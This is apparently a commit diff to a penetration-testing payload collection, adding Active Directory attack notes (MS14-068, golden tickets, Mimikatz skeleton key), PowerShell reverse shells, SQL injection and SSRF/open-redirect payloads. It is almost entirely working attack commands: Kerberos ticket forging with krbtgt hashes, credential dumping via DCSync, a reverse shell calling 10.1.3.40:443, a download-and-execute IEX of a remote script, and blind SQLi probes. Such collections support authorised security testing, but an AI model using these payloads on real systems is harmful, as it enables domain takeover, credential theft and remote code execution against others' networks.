AD Attack - Golden Ticket + SQL/OpenRed/SSRF

2024-11-10 15:14:34 +00:00 · 2018-04-12 23:23:41 +02:00 · 2018-04-12 23:23:41 +02:00 · b8fbca3347
commit b8fbca3347
parent 354d94219e
8 changed files with 92 additions and 9 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -6,6 +6,11 @@
    Exploit Python: https://www.exploit-db.com/exploits/35474/
    Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
    Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
+
+    git clone https://github.com/bidord/pykek
+    python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
+    python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
+    mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
    ```
  * MS17-010 (Eternal Blue - Local Admin)
    ```c
@ -41,8 +46,24 @@
  ```
  * Golden Tickets
  ```c
-  mimikatz
-  kerberos::ptc tgt.bin
+  Get info - Mimikatz
+  lsadump::dcsync /user:krbtgt
+  lsadump::lsa /inject /name:krbtgt
+
+  Get info - Meterpreter(kiwi)
+  dcsync_ntlm krbtgt
+
+  Forge a Golden ticket - Mimikatz
+  kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
+  kerberos::tgt
+
+  Forge a Golden ticket - Metasploit
+  post/windows/escalate/golden_ticket
+
+  Forge a Golden ticket - Meterpreter
+  load kiwi
+  golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
+  kerberos_ticket_use /root/Downloads/pentestlabuser.tck
  ```
  * Kerberoast
    ```c
@ -120,3 +141,4 @@ net group "Domain Admins" hacker2 /add /domain
 * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
 * [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)
 * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
+ * [Golden ticket](https://pentestlab.blog/2018/04/09/golden-ticket/)
--- a/Resources/Reverse
+++ b/Resources/Reverse
@ -72,6 +72,11 @@ Powershell
 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```

+```powershell
+powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
+```
+
+
 ```powershell
 powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
 ```
--- a/Resources/Windows
+++ b/Resources/Windows
@ -22,6 +22,16 @@ Mimikatz Golden ticket
 .\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
 ```

+Mimikatz Skeleton key
+```
+privilege::debug
+misc::skeleton
+
+# map the share
+net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
+# login as someone
+rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
+```


 ## Mimikatz commands
@ -62,3 +72,4 @@ More informations can be grabbed from the Memory with :

 ## Thanks to
 * [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
+ * [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
--- a/redirect/README.md
+++ b/redirect/README.md
@ -10,6 +10,10 @@ WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELIS
 ```

 ## Exploitation
+Using a whitelisted domain or keyword
+```
+www.whitelisted.com.evil.com redirect to evil.com
+```

 Using CRLF to bypass "javascript" blacklisted keyword
 ```
--- a/injection/MSSQL
+++ b/injection/MSSQL
@ -37,7 +37,7 @@ SELECT name, password FROM master..sysxlogins
 SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)

 MSSQL 2005
-SELECT name, password_hash FROM master.sys.sql_logins 
+SELECT name, password_hash FROM master.sys.sql_logins
 SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
 ```

@ -78,3 +78,4 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
 ## Thanks to
 * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
 * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
+ * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
--- a/injection/MySQL
+++ b/injection/MySQL
@ -48,6 +48,21 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
 ```

+## MYSQL Blind using a conditional statement
+TRUE: `if @@version starts with a 5`:
+```
+2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
+Response:
+HTTP/1.1 500 Internal Server Error
+```
+
+False: `if @@version starts with a 4`:
+```
+2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
+Response:
+HTTP/1.1 200 OK
+```
+
 ## MYSQL Blind with MAKE_SET
 ```
 AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
--- a/injection/README.md
+++ b/injection/README.md
@ -4,27 +4,45 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t

 ## Entry point detection
 Detection of an SQL injection entry point
+Simple characters
 ```
 '
-"
 %27
-" / %22
-; / %3B
+"
+%22
+#
+%23
+;
+%3B
+)
+Wildcard (*)
+```
+
+Multiple encoding
+```
 %%2727
 %25%27
+```
+
+Merging characters
+```
 `+HERP
 '||'DERP
 '+'herp
-' ' DERP
+' 'DERP
+'%20'HERP
+'%2B'HERP
+```
+
+Weird characters
+```
 Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
 transformed into U+0022 QUOTATION MARK (")
 Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
 transformed into U+0027 APOSTROPHE (')
-Wildcard (*)
 ```


-
 ## SQL injection using SQLmap
 Basic arguments for SQLmap
 ```
@ -329,6 +347,8 @@ mysql> mysql> select version();


 ## Thanks to - Other resources
+* Detect SQLi
+  - [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
 * MySQL:
  - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
  - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
--- a/injection/README.md
+++ b/injection/README.md
@ -61,6 +61,11 @@ Bypass localhost with a domain redirecting to locahost
 ```
 http://localtest.me
 http://n-pn.info
+http://customer1.app.localhost.my.company.127.0.0.1.nip.io
+```
+The service nip.io is awesome for that, it will convert any ip address as a dns.
+```
+NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
 ```

 Bypass localhost with CIDR : 127.x.x.x